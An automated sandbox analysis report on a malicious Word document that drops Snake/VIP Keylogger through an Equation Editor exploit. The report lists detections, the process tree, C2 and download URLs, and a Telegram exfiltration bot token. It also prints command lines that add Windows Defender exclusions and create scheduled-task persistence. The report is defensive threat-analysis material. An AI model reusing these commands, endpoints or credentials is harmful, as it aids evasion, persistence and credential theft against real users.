Windows Analysis Report
order072724.docx.doc

Overview

General Information

Sample name: order072724.docx.doc
Analysis ID: 1483266
MD5: d89c00ac44e63c962db8c02cbf0bab93
SHA1: 2ac1b269e93b1a0c0068b68d8d1d4f9e4a5cc06a
SHA256: 5dc96311ffca3ae13e805020a61d276e2a2b1032e2ecc87a05f86c346e90d47c
Tags: doc

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 748 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3408 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • swagodi78811.scr (PID: 3468 cmdline: "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: C448536AEEA36B80A15D639E31C7B847)
        • powershell.exe (PID: 3544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3704 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • swagodi78811.scr (PID: 3864 cmdline: "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: C448536AEEA36B80A15D639E31C7B847)
        • swagodi78811.scr (PID: 3880 cmdline: "C:\Users\user\AppData\Roaming\swagodi78811.scr" MD5: C448536AEEA36B80A15D639E31C7B847)
  • taskeng.exe (PID: 3888 cmdline: taskeng.exe {52F5B264-C702-43C6-8445-EB0747C55549} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • gRpkBp.exe (PID: 4016 cmdline: C:\Users\user\AppData\Roaming\gRpkBp.exe MD5: C448536AEEA36B80A15D639E31C7B847)
      • powershell.exe (PID: 4084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3244 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • gRpkBp.exe (PID: 2060 cmdline: "C:\Users\user\AppData\Roaming\gRpkBp.exe" MD5: C448536AEEA36B80A15D639E31C7B847)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7222270709:AAEe8p8C3uTJGMDBeQJ80Oh9drnBDJzIaE4", "Chat id": "-4219735485"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x4cbe0:$obj2: \objdata
  • 0x4cbfa:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x4cbe0:$obj2: \objdata
  • 0x4cbfa:$obj3: \objupdate
Source | Rule | Description | Author | Strings
00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x482e:$a1: get_encryptedPassword
  • 0x4b5f:$a2: get_encryptedUsername
  • 0x463e:$a3: get_timePasswordChanged
  • 0x4747:$a4: get_passwordField
  • 0x4844:$a5: set_encryptedPassword
  • 0x5eeb:$a7: get_logins
  • 0x5e37:$a10: KeyLoggerEventArgs
  • 0x5a9c:$a11: KeyLoggerEventArgsEventHandler
00000014.00000002.663140063.000000000043C000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
10.2.swagodi78811.scr.316cb90.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.swagodi78811.scr.316cb90.4.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
10.2.swagodi78811.scr.316cb90.4.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
10.2.swagodi78811.scr.316cb90.4.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2bc2e:$a1: get_encryptedPassword
  • 0x2bf5f:$a2: get_encryptedUsername
  • 0x2ba3e:$a3: get_timePasswordChanged
  • 0x2bb47:$a4: get_passwordField
  • 0x2bc44:$a5: set_encryptedPassword
  • 0x2d2eb:$a7: get_logins
  • 0x2d237:$a10: KeyLoggerEventArgs
  • 0x2ce9c:$a11: KeyLoggerEventArgsEventHandler
10.2.swagodi78811.scr.316cb90.4.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x39a63:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x39106:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39363:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39d42:$a5: \Kometa\User Data\Default\Login Data

                System Summary

Source: Network Connection, Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.52.88, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", ProcessId: 3544, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\swagodi78811.scr, NewProcessName: C:\Users\user\AppData\Roaming\swagodi78811.scr, OriginalFileName: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3408, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ProcessId: 3468, ProcessName: swagodi78811.scr
Source: File created, Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", ProcessId: 3704, ProcessName: schtasks.exe
Source: DNS query, Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\swagodi78811.scr, QueryName: checkip.dyndns.org
Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 748, Protocol: tcp, SourceIp: 104.21.52.88, SourceIsIpv6: false, SourcePort: 443
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 748, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr", ProcessId: 3544, ProcessName: powershell.exe
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3544, TargetFilename: C:\Users\user\AppData\Local\Temp\zanpl0wu.bwl.ps1

                Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\swagodi78811.scr", ParentImage: C:\Users\user\AppData\Roaming\swagodi78811.scr, ParentProcessId: 3468, ParentProcessName: swagodi78811.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp", ProcessId: 3704, ProcessName: schtasks.exe
                No Snort rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-26T23:45:45.269177+0200 | 2803274 | 49187 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:46.595188+0200 | 2803274 | 49191 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:47.482045+0200 | 2803305 | 49193 | 443 | TCP | Unknown Traffic
2024-07-26T23:45:43.939318+0200 | 2803305 | 49186 | 443 | TCP | Unknown Traffic
2024-07-26T23:45:45.672752+0200 | 2803305 | 49189 | 443 | TCP | Unknown Traffic
2024-07-26T23:45:47.219644+0200 | 2803305 | 49192 | 443 | TCP | Unknown Traffic
2024-07-26T23:45:34.439640+0200 | 2803274 | 49171 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:38.046315+0200 | 2803274 | 49176 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:35.862446+0200 | 2803274 | 49174 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:30.886952+0200 | 2803274 | 49171 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:39.432931+0200 | 2803274 | 49177 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:39.278729+0200 | 2803274 | 49176 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:42.289531+0200 | 2803274 | 49182 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:41.727950+0200 | 2803274 | 49180 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:34.870932+0200 | 2803305 | 49173 | 443 | TCP | Unknown Traffic
2024-07-26T23:45:40.927537+0200 | 2803274 | 49177 | 80 | TCP | Potentially Bad Traffic
2024-07-26T23:45:21.214935+0200 | 2022053 | 443 | 49168 | TCP | A Network Trojan was detected
2024-07-26T23:45:39.742773+0200 | 2803305 | 49179 | 443 | TCP | Unknown Traffic

                AV Detection

Source: https://meridianresourcellc.top/swagodi.scrj, Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/swagodi.scrsoC:, Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/, Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/swagodi.doc, Avira URL Cloud: Label: phishing
Source: https://meridianresourcellc.top/swagodi.scr, Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/swagodi.scrllC:, Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp, Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Source: 10.2.swagodi78811.scr.316cb90.4.unpack, Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7222270709:AAEe8p8C3uTJGMDBeQJ80Oh9drnBDJzIaE4", "Chat id": "-4219735485"}
Source: order072724.docx.doc, ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr, Joe Sandbox ML: detected

                Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org

                Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 104.21.52.88 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr
Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr, Stream path '_1783521069/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown, HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown, HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49203 version: TLS 1.2
                Source: Binary string: lxqb.pdbSHA256 source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
                Source: Binary string: lxqb.pdb source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr

                Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00676C7Ah20_2_006769A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00674C51h20_2_00674980
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067B082h20_2_0067AD88
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00672C69h20_2_00672998
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00679D62h20_2_00679A68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00677111h20_2_00676E40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067B54Ah20_2_0067B250
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067E51Ah20_2_0067E220
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673101h20_2_00672E30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067CD32h20_2_0067CA38
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006710D9h20_2_00670E08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067FD02h20_2_0067FA08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006750E9h20_2_00674E18
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067E9E2h20_2_0067E6E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673599h20_2_006732C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006775A9h20_2_006772D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00675581h20_2_006752B0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673A31h20_2_00673760
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00677A41h20_2_00677770
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00675A19h20_2_00675748
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067A22Ah20_2_00679F30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00671A09h20_2_00671738
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067D1FAh20_2_0067CF00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067BA12h20_2_0067B718
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00675EB1h20_2_00675BE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067BEDAh20_2_0067BBE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00673EA1h20_2_00673BF8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067A6F2h20_2_0067A3F8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067D6C2h20_2_0067D3C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 00671EA1h20_2_00671BD0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 0067EEAAh20_2_0067EBB0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D4162h20_2_006D3E68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D033Ah20_2_006D0040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D1B22h20_2_006D1828
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D330Ah20_2_006D3010
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D1FEAh20_2_006D1CF0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D37D2h20_2_006D34D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D297Bh20_2_006D2680
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D1192h20_2_006D0E98
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D165Ah20_2_006D1360
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D2E42h20_2_006D2B48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D0802h20_2_006D0508
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D0CCAh20_2_006D09D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D3C9Ah20_2_006D39A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 006D24B2h20_2_006D21B8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BB5C1h20_2_021BB318
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BF0E1h20_2_021BEE10
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B92A9h20_2_021B9000
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B62E1h20_2_021B6038
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021B55D9h20_2_021B5330
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 4x nop then jmp 021BDCD9h20_2_021BDA30
